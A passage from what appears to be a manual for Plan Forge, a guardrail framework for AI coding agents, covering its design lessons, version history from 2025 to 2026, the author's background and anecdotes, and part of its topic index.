"The most powerful guardrail isn't 'do this.' It's 'don't do that.'"

Lesson 2 — Auto-Loading Beats Manual Attachment Every Time

Principle: Guardrails that require manual activation are guardrails that go unused. File-pattern-scoped auto-loading drives compliance from optional to default.

Failure mode it addresses: Early Plan Forge required developers to manually attach instruction files to each chat session. Adoption sat at roughly 20%, "whoever remembered." After the breakthrough of applyTo frontmatter, adoption climbed to 100% because activation became automatic on file edits.

Where it is enforced: Each instruction file in .github/instructions/ declares which file patterns it cares about via YAML frontmatter:

.github/instructions/security.instructions.md

---
description: Security guardrails for auth and middleware
applyTo: '**/auth/**,**/middleware/**'
---

When a file matching the pattern is edited, the instruction file loads automatically into the agent's context. See Customization → Custom Instructions for the full pattern reference.

Lesson 3 — The Builder Must Never Review Its Own Work

Principle: The session that wrote the code cannot evaluate it objectively. Sunk-cost bias is a property of the context window, not the model. A fresh review session catches what the build session is structurally unable to see.

Failure mode it addresses: In a single long chat session, the agent that wrote the code will always believe its code is correct. The blind spots that produced the bug live in the same token sequence as the proposed fix. Self-review fails silently, the agent gives itself a passing grade and moves on.

Where it is enforced: Plan Forge mandates session isolation. Builder works in Session 2; reviewer works in Session 3 with fresh context, the same guardrails, and independent judgment. See How It Works → Why Session Isolation Works for the deeper psychological breakdown, and How It Works → The 4-Session Model for the structural reference.

The analogy from the source essay: would a developer be allowed to merge their own PR without review? Same question, same answer for AI agents.

Lesson 4 — Slice Boundaries Are the Only Real Validation Points

Principle: Testing "at the end" does not work. Failures cascade across files faster than the agent can debug them. Validation must happen at every slice boundary, the agent cannot proceed to slice N+1 until slice N passes its gate.

Failure mode it addresses: Building 15 files before running tests guarantees that failures compound. The agent burns its context window chasing regressions that span files it has long since stopped reasoning about.

Where it is enforced: Every hardened plan decomposes a feature into 3–7 execution slices, each with its own Validation Gate. The orchestrator runs the gate after each slice and refuses to advance on failure. See Writing Plans → Slicing Strategy for the slice contract and How It Works → Building Blocks for the gate enforcement model.

Slice gates produce three observable benefits:

Failures are caught when they are small (1–3 files, not 15)
The agent fixes the problem with full context of what it just wrote
Green-to-green progression means a safe rollback point always exists

Lesson 5 — Focused Instruction Files Beat One Giant Guardrails Document

Principle: One concern per file. Each file under ~150 lines. Auto-loaded only when relevant. Long monolithic instruction documents process worse than short focused ones, agents cherry-pick what's convenient and ignore the rest.

Failure mode it addresses: The first version of Plan Forge had a single copilot-instructions.md at roughly 2,000 lines covering security, testing, architecture, database patterns, error handling, and deployment. Key rules buried, contradictions crept in, and the agent applied rules selectively.

Where it is enforced: The .github/instructions/ directory contains 18+ focused files, each with a single concern. See Customization → Custom Instructions for the inventory.

v2.18 extension: Temper Guards and Warning Signs: Each instruction file now ends with two named sections, Temper Guards documents the specific shortcuts agents take that produce compiling but architecturally broken code (e.g. "this is just a DTO, no logic to test", "N+1 won't matter at our scale"); Warning Signs lists observable anti-patterns that reviewers can grep for. Each file teaches not just what to do but why not to skip it.

Lesson 6 — Tech Stack Presets Are Not Optional

Principle: Every stack has different conventions. Guardrails that say "use PascalCase" to a Python developer get the entire system distrusted. Stack-aware presets eliminate the customization tax.

Failure mode it addresses: A stack-agnostic guardrail document either contradicts the project's conventions in places (loss of trust) or stays so generic that it fails to enforce anything specific (loss of value). The middle ground does not exist.

Where it is enforced: Nine first-party presets ship with Plan Forge, .NET, TypeScript, Python, Java, Go, Swift, Rust, PHP, and Azure IaC, selectable via setup.ps1 -Preset <name> at install time. Multi-preset combinations are supported (e.g. -Preset typescript,azure-iac) for full-stack projects. See Stack-Specific Notes for what each preset adjusts.

Lesson 7 — Enterprise Quality Must Be the Default, Not an Upgrade

Principle: Treating quality as optional ("add tests later", "we'll refactor", "security can wait") guarantees that the optional steps never happen. Quality must be structural, the path of least resistance must produce tested, validated, architecturally compliant code.

Failure mode it addresses: Every "we'll fix it later" trains the next agent session to copy the same shortcut. The codebase accumulates technical debt that nobody is responsible for paying down.

Where it is enforced: Hardened plans include test expectations per slice. Architecture guardrails load on every file change. Security guardrails load on every auth file. Testing guardrails load on every test file. There is no "opt in to quality" path, bypassing the defaults requires actively working around them.

v2.19 extension: Exit Proof: Every skill now ends with a verifiable checklist, not "it seems right" but "paste the test output, show the migration file, prove coverage didn't drop." Evidence over assumption. See Customization → Skills for the Exit Proof contract.

"The best developer tools don't make quality easier. They make it unavoidable."

Project History

Eleven inflection points from v1.0 (Summer 2025) to v3.6 (May 2026). Each one solved a specific problem the previous version exposed.

Plan Forge evolution timeline showing eight headline version milestones: v1.0 Summer 2025 (18 instruction files plus 4-session pipeline), v2.0 January 2026 (autonomous orchestrator plus 17 MCP tools), v2.5 February 2026 (Quorum Mode 3-model consensus), v2.10 March 2026 (OpenClaw bridge for cross-platform notifications), v2.14 March 2026 (Copilot platform integration), v2.18 April 2026 (Temper Guards plus Warning Signs plus Context Fuel), v2.83 May 2026 (host-aware routing plus quorum estimator plus complexity rubric), and v3.6 May 2026 highlighted in amber as current (OpenBrain promoted to L3 memory layer). The May 2026 v3.x sprint also shipped v2.95 Lattice code-graph indexing, v3.0 Copilot integration trilogy, and v3.2 through v3.4 Team Mode, covered in the prose sections below. — Plan Forge evolution timeline showing eight headline version milestones

When to read this chapter: understanding why a feature exists, evaluating whether a design constraint is foundational or contingent, or onboarding to the architecture's history.

Reference adaptation of the marketing essay From Impossible to 7 Minutes — A Year of Building AI Coding Guardrails (April 2026), extended through v3.6 from the CHANGELOG.

v1.0 — Foundation (Summer 2025)

What shipped: 18 specialized instruction files, prompt templates, and the 4-session pipeline (Specify → Plan → Execute → Review). Plan Forge at this point was "files you install", a guardrail collection that lived in the project's .github/ directory.

Inflection point: The breakthrough was not the file count. It was discovering that session isolation works, the builder cannot review its own work, but a separate session with fresh context catches blind spots reliably. This insight made consistent quality possible and became the foundation everything else built on. See How It Works → Why Session Isolation Works and Lessons Learned → Lesson 3.

What it solved: Single-session AI work had a quality ceiling, agents would believe their own bad code was correct because the bad code lived in the same context window as the proposed fix.

v2.0 — Autonomous Orchestrator (January 2026)

What shipped: DAG-based execution engine with CLI worker spawning, 17 MCP tools (forge_run_plan, forge_analyze, forge_diagnose, forge_cost_report, etc.), the pforge CLI, and the dashboard with live progress / cost aggregation / session replay.

Inflection point: Plan Forge stopped being "files you install" and became "a system that runs." The MCP server gave it a programmatic API; the dashboard gave it visibility; the orchestrator made full plan execution possible without human intervention between slices.

What it solved: Hardened plans existed in v1.0 but a human had to drive each slice. Long features required hours of supervised execution. The orchestrator removed the supervision tax for everything except gate failures.

v2.5 — Quorum Mode (February 2026)

What shipped: Multi-model consensus analysis. Three models analyze the same slice independently; a reviewer model synthesizes their findings into a unified report. See Advanced Execution → Quorum Mode for current mechanics.

Inflection point: Single-model execution was hitting its limits. Claude excelled at architecture; GPT at breadth; Grok brought a different analytical lens. Each model had blind spots, and those blind spots were consistent. Treating AI code analysis as a consensus process, the way human code review works, produced 20% more test recommendations than any single model alone (per quorum A/B test).

What it solved: Quality plateau on complex slices. One model's blind spot is another model's strength.

v2.10 — OpenClaw Bridge (March 2026)

What shipped: Cross-platform notification fan-out, Telegram, Slack, Discord, Microsoft Teams, PagerDuty, OpenClaw, with inline approval / reject flows for events that need a human. See Remote Bridge.

Inflection point: Plan Forge runs inside the IDE, but some decisions are not IDE-shaped. A reviewer flags drift at 2 AM. A quorum tie needs a human tiebreaker. An incident fires after the laptop closes. The bridge made the forge able to reach you instead of waiting for you to come back.

What it solved: The "I missed the notification" failure mode that blocked autonomous execution overnight or away from the desk.

v2.14 — Copilot Platform Integration (March 2026)

What shipped: Native VS Code experience, skills, agents, Plan Forge lifecycle hooks (PreDeploy, PreCommit, PreAgentHandoff, PostSlice, configured via .github/hooks/plan-forge.json), and instruction auto-loading via applyTo frontmatter. (These are not Claude Code's SessionStart / PreToolUse / PostToolUse / Stop hooks, the trigger semantics differ; see Installation for the mapping.) See Multi-Agent → Copilot.

Inflection point: Auto-loading turned guardrail adoption from optional ("whoever remembered") to default ("it just works"). The applyTo pattern moved compliance from roughly 20% to 100%. See Lessons Learned → Lesson 2.

What it solved: Manual instruction-file attachment was a dead pattern. Lifecycle hooks gave Plan Forge the ability to enforce rules at file-edit time rather than relying on the agent to remember to load them.

v2.18 — Temper Guards, Warning Signs, Context Fuel (April 2026)

What shipped: Each instruction file gained two new sections, Temper Guards documenting the specific shortcuts agents take that produce compiling but architecturally broken code, and Warning Signs listing observable anti-patterns reviewers can grep for. Context Fuel instruction file taught agents to manage their own context budgets.

Inflection point: Agent-skills analysis revealed a class of failure that previous guardrails missed, the model would write code that compiled, passed tests, and looked plausible while violating an architectural principle nobody had thought to forbid explicitly. Temper Guards captured these as named anti-patterns; Warning Signs gave reviewers a way to detect them.

What it solved: The "looks correct, is structurally wrong" failure mode. Compiling code is not architecturally compliant code.

v2.83 — Host-Aware Routing, Quorum Estimator, Complexity Rubric (May 2026)

What shipped: Host-aware model routing (subscription-vs-API billing surface awareness), forge_estimate_quorum tool for tool-backed cost projection across all four quorum modes, and the documented complexity scoring rubric (scoreSliceComplexity()) with seven weighted signals. See Host-Aware Routing and Estimating Quorum Cost.

Inflection point: Quorum cost was previously hand-computed by agents, and observed to overshoot reality by an order of magnitude. The estimator tool replaced chat math with measured projection. Host-aware routing fixed the silent-double-pay failure mode where gpt-* models on Claude Code or Cursor would bill the user's pay-per-token API instead of their existing subscription.

What it solved: Cost surprise. Both the quorum overhead surprise (estimator) and the host billing surprise (routing).

v2.95 — Lattice / Code-Graph Indexing (May 2026)

What shipped: Phase Lattice introduced tree-sitter-based code chunking, code-graph indexing, and the forge_lattice_* tool family (index, query, callers, blast, stat). Anvil caching for cost-effective re-indexing. Hallmark provenance tracking on every chunk. v3.5.1 added camelCase-aware relevance ranking via scoreChunk() / tokenizeForSearch().

Inflection point: Plan Forge could now reason about the user's actual codebase architecture, not just plans and instructions. Searching getUserById returns the function, its callers, and its blast radius across the repository. This made auto-generated plans architecture-aware: a slice that touches a hub function gets flagged as high-blast-radius before execution.

What it solved: Plans that looked safe in isolation but rippled unexpectedly. Pre-Lattice, the agent had to grep its way to architectural awareness slice by slice.

v3.0 — Copilot Integration Trilogy (May 2026)

What shipped: Three sync surfaces, completed in three consecutive releases. pforge sync-spaces (v2.98) generates Copilot Spaces from forge plans and principles. forge_sync_memories (v2.99) writes .github/copilot-memory-hints.md from cross-tool memory. forge_sync_instructions (v3.0) generates .github/copilot-instructions.md from project profile, project principles, extra instruction files, and .forge.json config.

Inflection point: Copilot became a first-class citizen of the Plan Forge ecosystem, not just one of several agent surfaces. Every Copilot conversation now opens with project-specific guidance auto-loaded by the platform, no manual setup, no forgotten attachments. This collapsed the onboarding gap for the largest installed base of any AI coding agent.

What it solved: Copilot users were getting generic guidance because copilot-instructions.md was hand-written or absent. The sync trilogy made the file always up to date and always reflective of the actual project's profile, principles, and configuration.

v3.2–3.4 — Team Mode (May 2026)

What shipped: Three releases focused on multi-developer awareness. v3.2 added .forge/team-activity.jsonl (shared run log), the forge_team_activity MCP tool, and pforge team activity. v3.3 added pforge github review delegate, when a slice produces a PR, an issue assigned to @copilot is filed with a structured review checklist, and the Copilot Coding Agent posts findings back on the PR. v3.4 added the Team tab in the dashboard with per-operator cards, success rates, costs, and a conflict-risk banner.

Inflection point: Plan Forge stopped being a solo tool. Teams running parallel plan executions against the same repository could now see who was working on what, get reviewer attention from the Copilot Coding Agent without a human handoff, and detect coordination risk before two developers stepped on each other's slices.

What it solved: The "two of us hit the same file" failure mode. And the "I shipped a PR but nobody reviewed it" failure mode.

v3.6 — OpenBrain Promotion / L3 Memory Made Loud (May 2026, current)

What shipped: OpenBrain, the optional cross-session semantic memory backend, was reframed from a row-5 "optional extension" to L3 memory layer with a clear on-ramp at every install touchpoint. pforge smith now always reports L3 status. setup.ps1 / setup.sh prompt for OpenBrain install at the end of the flow (auto-suppressed in CI). New pforge brain {status, hint, test, replay} subcommands. README gains a numbered Step 3 "Enable Persistent Memory" with four deploy options. The if (openBrainConfigured) gating did not change, Plan Forge still works perfectly without it. See Memory Architecture on GitHub.

Inflection point: OpenBrain hooks were already wired into 28 MCP tools, 4 search-before-acting prompts, Reflexion lessons, Auto-skills, and cross-project Federation, but every one was gated and silently no-op'd otherwise. Users who didn't know to install OpenBrain were getting Plan Forge's L1 (Hub events) plus L2 (.forge/*.jsonl durable files) memory but no persistent semantic memory across sessions. The inner loop that makes the agent improve over time was effectively dark. v3.6 made the L3 layer discoverable without changing any soft-fail behavior.

What it solved: The "Plan Forge isn't getting smarter over time" failure mode. Without L3, Reflexion lessons, Auto-skills, and postmortem learnings had nowhere durable to live across sessions.

About the Author

Scott Nichols

Director, Strategic Account Technology Strategist (Virtual CTO), Microsoft

Software & Digital Platforms · Boise, ID

GitHub LinkedIn

Brand new here? Start with What Is Plan Forge for the 60-second overview, then come back.

About the Microsoft title. I mention it because being close to the source of these models (Copilot, Azure OpenAI, MCP) is part of why Plan Forge looks the way it does. I see how the primitives are built and where they break, and that shapes what gets built on top of them. Plan Forge itself is a personal project, not a Microsoft product. The code, the opinions, and any breakage are mine.

Why I Built This

Plan Forge came from frustration, my own.

I've spent my career as a software architect. First building enterprise systems, then helping teams at Microsoft build them on Azure. I know what good architecture looks like: clean layers, clear boundaries, every component with a purpose. Lasagna, not spaghetti.

When AI coding agents arrived, I was excited. Here was a tool that could generate code faster than any team I'd ever managed. But the excitement wore off fast. The agents were brilliant at greenfield work, scaffolding, boilerplate, CRUD endpoints, but they had no concept of architectural discipline. They made decisions I didn't ask for, expanded scope without warning, and produced code that compiled but couldn't be maintained.

Sound familiar? If you've hit the 80/20 wall (the point where AI-built code stops scaling), you know exactly what I mean.

I realized the problem wasn't the models. The models were capable. The problem was that nobody was giving them structure. No scope contracts. No validation gates. No separation between building and reviewing. We'd spent decades learning that human dev teams need guardrails, code reviews, and architectural governance, then handed AI agents a blank prompt and said "build me an app."

So I started writing those guardrails. First as instruction files I pasted into Copilot chats. Then as structured prompts. Then as a pipeline with sessions and validation gates. Then as a full framework with agents, skills, lifecycle hooks, an orchestrator, a dashboard, and cost tracking.

I built Plan Forge because I needed it. The same impulse that made me establish coding standards for human teams drove me to establish them for AI teams. The tools are different, but the principles are the same: clear scope, layered architecture, validation at boundaries, independent review, and no spaghetti code, ever.

If I'm being honest, Plan Forge also exists because of Spec Kit. That was the project that taught me the fix wasn't a better model. It was structure. Define what you want. Plan before you build. Stop letting the agent improvise. Plan Forge took that idea and pushed on it: scope contracts, auto-loading guardrails, isolated review sessions, multi-model consensus, then a whole runtime watch layer for what happens after the build leaves the shop. The two tools are still better together. See the Spec Kit interop chapter for the details.

Why a Forge?

People ask why the forge metaphor. Why not "Plan AI" or "Spec Pipeline" or some other clean-tech name? Because I'm a huge advocate of software as craft, and the trades got there first.

I'm a metal and wood worker in my own home workshop. There's something about working with your hands, hammering, planing, joining, fitting, that teaches discipline you cannot shortcut. The apprentice learns under a journeyman, the journeyman learns under a master, and at every step the work has to pass inspection before it leaves the shop. Skip a step and the piece fails. Lie about a measurement and someone gets hurt downstream. That's a culture of care that modern software development has mostly forgotten, and AI agents (left alone with a blank prompt) forget it even faster than humans do.

The forge is the oldest expression of that culture. Fire, hammer, anvil, water, repeat. Every great piece of metalwork came out of a disciplined process with explicit stages, and the smith had a name for every step. I wanted Plan Forge to feel the same way. Every concept in the framework has a real-world craft analog. A plan is a work order. A reviewer agent is a quality inspector. The Crucible is where raw material gets melted down and reshaped. LiveGuard is the warranty card after the piece leaves the shop. The four-station shop layout is literally the floor plan of a working forge, divided by function.

Naming things this way isn't decoration, it's a forcing function. If I can't find a real-world equivalent for an abstraction, that's usually a sign the abstraction isn't doing real work. The metaphor catches things that look like software but aren't actually building anything. Software is a young craft, but it doesn't have to be a careless one. Plan Forge is my attempt to bring the old traditions (apprentice to journeyman to master, hammer and anvil, fit and finish) into the place where AI agents and humans build things together.

Moments From the Forge

People sometimes ask which specific failure made me start writing guardrails. Honestly, it wasn't one. It was the same failure on loop. A few of them stuck hard enough to change the design.

The 2,000-line file

My first attempt at fixing any of this wasn't a framework. It was a single copilot-instructions.md that ballooned to about 2,000 lines: security, testing, architecture, deployment, everything I could think of crammed into one document. It was terrible. The agent cherry-picked, ignored half of it, and treated rules buried after line 1,500 as optional suggestions.

But it was also the first time I watched an AI consistently produce an interface before a concrete class. For one beautiful moment, somebody had told it what good looked like. The model didn't get smarter. It got direction. That was the hypothesis I've been refining ever since, and the reason today's instruction files are 80 to 200 lines each, auto-loaded by file pattern, one concern per file.

The demo with a database

Through 2025 I kept watching the same pattern in client demos. An agent would build a CRUD app from a single prompt. Five minutes in, the room would gasp. Endpoints, a UI, real data flowing. Five days later, that same app couldn't survive a second feature being added. No interfaces. No DTOs. Errors swallowed by catch (Exception). Tests that only covered the happy path. No cancellation tokens. No consideration for financial precision in code that was literally adding up money.

What we kept calling "software" was a demo with a database glued underneath. That's the 80/20 wall before anyone had named it: AI gets you to 80% in 20% of the time, and then the remaining 20% (the architecture, the tests, the error handling, the security) takes the other 80% of the effort to bolt on, while the AI-generated foundation fights you every step of the way.

The login page that grew an admin panel

I asked an agent for a login page once. I got a login page, a password reset flow, a user profile screen, a half-built admin panel, and a database migration that touched four tables I never mentioned. The agent wasn't being creative. It was being thorough with zero scope constraints.

That's the day "Forbidden Actions" became a required section in every Plan Forge plan. Explicit prohibitions like "do NOT add features outside this spec, do NOT refactor untouched files, do NOT change the schema beyond what's specified" cut scope drift by an order of magnitude. The most powerful guardrail isn't "do this." It's "don't do that."

The reviewer with no memory

The hardest lesson to internalize was that an agent in a long session will always believe its own code is correct. It has sunk-cost bias baked into the context window. It literally cannot see its own blind spots because those blind spots are sitting in the same token sequence that produced the code.

The first time I ran the same review prompt in a fresh session (same guardrails, no memory of the shortcuts the builder had considered and rejected), it caught fifteen issues the original session swore weren't there. Session isolation between builder and reviewer stopped being a nice idea and became a non-negotiable. It's why Plan Forge runs four sessions instead of one, why Session 3 is always a fresh reviewer, and why I trust that reviewer's output more than I trust my own first read.

The customer-reported broken link

Late in 2025 a customer reported a broken link on a page I'd shipped weeks earlier with an AI agent. I opened the file. Sure enough, a <a href="#"> placeholder the agent had left as scaffolding and nobody had grepped for. Then I went looking for siblings. There were twenty-three of them across the site. Plus a "Coming soon" on the pricing page. Plus a TODO in the FAQ. The build had been "green" the entire time because nothing in our pipeline was actually looking for those things in the deployed artifact.

That's where LiveGuard came from. The forge can't just stop caring at git push. Drift scoring, secret scanning, dep watch, regression guards: the build leaves the shop, but the watching shouldn't. The on-call runbooks grew out of the same incident.

Background

My work at Microsoft focuses on Azure enterprise architecture, helping organizations design cloud systems that scale, stay secure, and remain maintainable over years. Before that, I built distributed systems, designed multi-tenant SaaS platforms, and ran engineering teams where architecture governance was a daily concern.

That background shapes Plan Forge in specific ways. Three threads from my day-job work show up directly in the framework:

Stamps pattern architecture, my open-source StampsPattern project brings Azure enterprise cell isolation to infrastructure-as-code. The same boundary-thinking shows up in every Plan Forge scope contract and in the enterprise reference architecture.
Multi-tenant isolation, years of building SaaS platforms taught me that "works for one tenant" is not the same as "works for all tenants." Plan Forge's multi-tenancy reviewer agent comes from real production incidents.
Guardrails as culture, every great team I've worked on had non-negotiable standards. The bad ones always thought they were "agile" enough to skip them. The guardrails aren't about distrust, they're about consistency. The instruction files exist so the same rules apply whether your team member is a junior dev, a senior engineer, or an AI model.

Where I Am With It Today

I use Plan Forge daily. It builds itself (the version of the manual you're reading was generated by the version of the pipeline before it), it builds my homelab tooling, and it's the way I onboard every new client project. When I find a rough edge, I file the bug into my own queue and the next phase fixes it. That feedback loop, me eating my own dog food, is the only reason the framework has survived past v1.

A Passion Project, Built in the Open

One thing I want to be straight about: Plan Forge is a passion project. It's something I build nights and weekends because the problem genuinely bugs me, not because anyone is paying for a feature roadmap, not because there's a release-quality QA team behind it, and not because every corner is polished. It isn't perfect. It probably never will be. There will be rough edges in the CLI, the dashboard will surprise you sometimes, and the docs will lag behind the code more often than I'd like.

What it does have is a tight feedback loop with the people actually using it. Every meaningful improvement in the last year came out of someone trying it on a real project, hitting a wall, and telling me what broke. That covers auto-loading instruction files, the Forbidden Actions section, quorum mode, LiveGuard, the four-station shop layout, and the Crucible interview. Plan Forge grows by your input. That's not a marketing line; it's literally how the roadmap gets built. See the project history and lessons learned chapters for the receipts.

So if you try it and it stumbles, please tell me. File an issue. Open a PR. Comment on a blog post. Build an extension for a niche your team cares about. The best version of Plan Forge is the one shaped by the people who actually have to ship software with it. If you're stuck before you even get there, the troubleshooting chapter and failure-mode catalog usually have a head start on the answer.

If you're looking for something specific to dig into, the highest-impact contributions right now are: language presets beyond .NET, Node, and Python (Rust, Go, and Java are mapped but under-tested), notification extensions for Slack / Teams / PagerDuty / email, new entries for the failure-mode catalog, and reviewer agents for domains I don't work in daily (ML pipelines, mobile, embedded). If you ship something in one of those areas, I will absolutely talk about it.

GitHub: srnichols/plan-forge. Issues, discussions, PRs all welcome.
Blog: planforge.software/blog. Long-form posts on what's working, what isn't, and why.
Contributing: View contributing guide on GitHub
Extensions: Build and publish your own domain guardrails. See Chapter 12.
Customizing the framework: Chapter on customization walks through tweaking presets, skills, and hooks.
License: MIT. Fork it, embed it, rewrite half of it. Whatever helps your team ship better software.

Plan Forge builds Plan Forge. Every feature in this framework was developed using the same pipeline it ships to users: 55+ phases, 7,500+ self-tests, v1.0 through v3.11 with zero manual rollbacks. If the pipeline can build itself without drift, it can build your project too. And when it can't, that's where you come in.

Appendix O

Book Index

A–Z topic index, every concept, tool, and named section across the manual with a direct link to the page that covers it.

How this is built. This page is auto-generated by node docs/manual/maintain.mjs from the chapter list and curated section index in assets/manual.js. To add a new entry, add it to the relevant page and re-run the script. See also the Glossary for definitions of core terms.

Jump to letter

A B C D E F G H I L M N O P Q R S T U V W Y

A

A Day in the Forge — Three Vignettes

A Day in the Life of a Slice

About the Author

Actions Tab

Adoption Path - Two Routes (Stakeholder Briefing)

Advanced Execution

Agent Factory — The Recipe in One Page

Agent Factory Recipe

Agent Not Following Guardrails

Agents Don't Drift Maliciously

Air-Gapped Deployment

analyze vs diagnose

Ch 8 · CLI Reference

Anvil (L3 boundary, DLQ, capability handshake)

Anvil & Lattice Dashboard Tab

API Key Configuration

applyTo Pattern Reference

Audit Loop (Deep Dive)

Audit-Loop Activation

Auto-Loading Beats Manual

Azure Government

B

Bug Registry MCP Tools

C

Capacity Planning (Per-Team Sizing)

Check Prerequisites

Choosing Your Preset

CI Integration GitHub Actions

Claude Code Setup

CLI Reference

Ch 8 · CLI Reference

Clone and Run Setup

Cloud Agent

Codex Setup

Common Error Messages

Common Mistakes

Compliance — Audit Logging

Compliance — Data Flow

Compliance — Identity and Authentication

Compliance & Data Residency

Compliance Posture (SOC2 / HIPAA / PCI / FedRAMP / GDPR)

Config Tab

Configuration Hierarchy

Context Files per Slice

Conventions Used in This Manual

copilot-instructions.md

Core MCP Tools

Cost — Anti-lock-in posture (BYOK, no proxy, no telemetry, open pricing)

Cost — Cost drivers (model tier, tokens, quorum, cache, reasoning, retries)

Cost — Cost-effective workflows (slice sizing, routing, gates, cache, quorum)

Cost — Estimate vs actuals (forge_estimate_quorum vs forge_cost_report)

Cost — Forecasting at scale (groupBy model / role / scope)

Cost — Orientation (BYOK, no markup, per-slice attribution)

Cost — Per-quorum-mode economics (auto / power / speed / disabled)

Cost — Three sources of truth (pricing table, estimators, actuals)

Cost — Worked example (slice B5 ship REST API reference)

Cost & Economics

Cost Discipline

Cost Optimization

Cost Tab

Cost Tracking

Costs Are Too High

Creating Extensions

Cross-Stack Agents

Ch 5 · Crucible (Idea Smelting)

Crucible (Idea Smelting)

Crucible MCP Tools

Cursor Setup

Custom Instruction Files

Customization

D

Dashboard — Forge-Master

Dashboard — LiveGuard

Dashboard — Settings

Dashboard Won't Load

Day 1 — Pilot Installation

Diagnostic Tools

Ch 10 · Instruction Files & Agents

Discovery Harness Implementation

Audit Loop (Deep Dive)

Domain Instruction Files

E

Easy Button (one-prompt install)

Ch 20 · The Remote Bridge

End-to-End Workflow: WhatsApp to Shipped PR

Enterprise Architect Ladder (Reader Paths)

Enterprise Reference Architecture

Env Vars — Azure OpenAI Alternative Routing

Env Vars — CLI Internal (set transiently by pforge)

Env Vars — Feature Toggles

Env Vars — Host Detection (read-only)

Env Vars — Orchestrator Timing (gate, worker timeouts)

Env Vars — Project and Runtime

Env Vars — Provider API Keys (XAI, OpenAI, Anthropic)

Env Vars — Resolution Precedence

Env Vars — Server Ports and Network

Env Vars — Telemetry (OpenTelemetry)

Env Vars — Worked Example (PowerShell profile)

Env Vars Reference — Orientation

Environment Variables Reference

Errors & Exit Codes

Errors & Exit Codes — CI / scripting recipes

Errors & Exit Codes — Error events on the hub

Errors & Exit Codes — MCP tool errors (forge_* envelope)

Errors & Exit Codes — Named error catalog (A-Z)

Errors & Exit Codes — Orchestrator exit codes & statusReason

Errors & Exit Codes — Orientation (4 layers)

Errors & Exit Codes — OS subprocess exits (Ctrl+C, SIGKILL, SIGTERM)

Errors & Exit Codes — pforge CLI exit codes (0/1/2)

Errors & Exit Codes — REST error shape (HTTP 400/404/409/429/500)

Escalation Chains

Estimating Quorum Cost forge_estimate_quorum

Event Catalog

Event Catalog — Bridge (approval-*, bridge-notification-*)

Event Catalog — Client→server (set-label)

Event Catalog — Common Envelope (version, type, source, security_risk)

Event Catalog — Consuming the Stream (WebSocket subscription)

Event Catalog — Crucible (crucible-smelt-*)

Event Catalog — Escalation & CI (slice-escalated, ci-triggered)

Event Catalog — Lifecycle (run-started, slice-*, run-completed)

Event Catalog — LiveGuard (drift, incident, secret-scan, watch-*)

Event Catalog — Orientation

Event Catalog — Retention (hub ring, run journal, LiveGuard cache, OpenClaw)

Event Catalog — security_risk enum

Event Catalog — Skills (skill-started, skill-step-*)

Event Catalog — source enum

Event Catalog — Tempering (bug-validated-fixed)

Evidence A/B Test Results

Execute the Plan (Quickstart)

Executive Summary (Stakeholder Briefing)

Extension Author Ladder (Reader Paths)

Extension Catalog

Extensions

F

.forge.json — agents (claude, cursor, codex)

.forge.json — brain.federation (cross-project memory)

.forge.json — Execution Limits (parallelism, retries)

.forge.json — extensions

.forge.json — forgeMaster reasoning loop

.forge.json — Full Annotated Example

.forge.json — hooks.postSlice (drift thresholds)

.forge.json — hooks.preAgentHandoff

.forge.json — hooks.preDeploy (LiveGuard)

.forge.json — meta.selfRepairRepo

.forge.json — modelRouting (default, execute, review)

.forge.json — openclaw analytics bridge

.forge.json — Project Identity (projectName, preset)

.forge.json — quorum (multi-model consensus)

.forge.json — runtime.gateSynthesis (Phase-25 L6)

.forge.json — runtime.reviewer (Phase-25 L4)

.forge.json — testbed.path

.forge.json — updateSource (auto / github-tags)

.forge.json Config

.forge.json Reference

.forge.json Reference — Orientation

Failure Mode FM1 — Token limit hit

Failure Mode FM10 — Worker spawn failure

Failure Mode FM11 — Git stash conflict on rollback

Failure Mode FM12 — Snapshot apply failure

Failure Mode FM13 — Plan parse error

Failure Mode FM14 — Provider rate limit (HTTP 429)

Failure Mode FM15 — Provider 5xx / outage

Failure Mode FM16 — Auth expired

Failure Mode FM17 — L2 jsonl corruption

Failure Mode FM18 — L3 endpoint unreachable

Failure Mode FM19 — Hook false positive

Failure Mode FM2 — Model timeout

Failure Mode FM20 — Hook script error

Failure Mode FM21 — Quorum panel disagrees below threshold

Failure Mode FM22 — Quorum panelist timeout

Failure Mode FM23 — Port already in use

Failure Mode FM24 — Disk full

Failure Mode FM25 — File locked (Windows)

Failure Mode FM3 — Malformed tool call

Failure Mode FM4 — Edit blocked by scope / forbidden actions

Failure Mode FM5 — Worker loop detected

Failure Mode FM6 — Gate test failure (legitimate)

Failure Mode FM7 — Gate timeout

Failure Mode FM8 — Non-portable gate command

Failure Mode FM9 — Documentation validator drift

Failure Modes — General recovery techniques

Failure Modes — Index (25 failure modes across 8 layers)

Failure-Mode Catalog

Feature Parity Matrix

Fleet KPIs

Fleet Operator Playbook

Focused Instructions Beat Generic Ones

Foreword — From Impossible to Seven Minutes

forge_abort Stop Execution

forge_analyze Consistency Scoring

forge_capabilities Discovery

forge_diagnose Bug Investigation

forge_estimate_quorum Cost Preview

forge_generate_image

forge_plan_status Execution Status

forge_run_plan Execute Plan

forge_smith Environment Check

forge_sync_memories (Copilot Memory soft-sync)

Forge-Master

Forge-Master MCP Tool

Forge-Master Studio Tab

G

Gemini Setup

Generic Enterprise Reference Architecture

GitHub Stack Alignment

Glossary

Ch A · Glossary

Grok Image Generation

Ch D · Grok Image Warnings

Grok Image Warnings

H

Hallmark (provenance, hallmark/v1)

Harden the Plan (Quickstart)

Health DNA

Ch 25 · Health DNA

Host-Aware Routing

How Do I — Brief Stakeholders and Onboard Readers

How Do I — Customize Plan Forge for My Project

How Do I — Debug and Troubleshoot

How Do I — Execute a Plan

How Do I — Extend and Integrate

How Do I — Install and Set Up

How Do I — Operate at Scale (Teams and Fleets)

How Do I — Plan a Feature

How Do I — Review and Ship

How Do I — The Nine Intent Groups

How Do I…? — Task Index

How Guardrails Auto-Load (applyTo)

How It Works

How Plan Forge Composes with GitHub

How the New Memory Pieces Fit the Old Tiers

How the Shop Remembers

How To Read This Book (Foreword)

I

Independent Review (Quickstart)

Independent Review Catches What Builds Miss

Install

Installation

Installing Extensions

Ch 10 · Instruction Files & Agents

Instruction Files & Agents

Instructions & Agents — Reference

Integrating from Outside

Ch 29 · Integrating from Outside

L

Lattice (code-graph, chunker, callers, blast)

Lessons Learned

Lifecycle Hooks

Lifecycle Hooks — Copilot session (SessionStart, PreToolUse, PostToolUse, Stop)

Lifecycle Hooks — LiveGuard (PreDeploy, PostSlice, PreAgentHandoff)

Lifecycle Hooks — Plan-execution guard (PreCommit)

Lifecycle Hooks — Resolution order

